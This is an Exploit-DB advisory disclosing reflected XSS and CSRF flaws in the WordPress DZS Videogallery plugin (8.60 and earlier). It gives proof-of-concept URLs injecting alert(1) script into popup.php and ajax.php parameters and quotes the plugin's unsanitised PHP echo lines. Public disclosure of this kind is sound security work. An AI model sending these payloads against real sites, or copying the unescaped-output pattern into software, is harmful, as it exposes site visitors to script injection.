WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities

2016-03-11T00:00:00
ID EDB-ID:39553
Type exploitdb
Reporter Colette Chamberland
Modified 2016-03-11T00:00:00

Description

WordPress DZS Videogallery Plugin 8.60 - Multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            * Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
* Discovery Date: 01.05.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://digitalzoomstudio.net/
* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: <=8.60
* Tested on: Wordpress 4.2.x-4.4.x
* OVE-20160305-2497


Technical details:

Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output):
       <?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------       
Unauthenticated CSRF &  XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645

Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output):
       <?php echo "var initer = '" . $initer . "';"; ?>
--------------------------------------- 
Unauthenticated CSRF & XSS:
POC(s):
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b

Line 25 & 35 (unsanitized input & direct output):
$w =  $_GET['width'];
<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'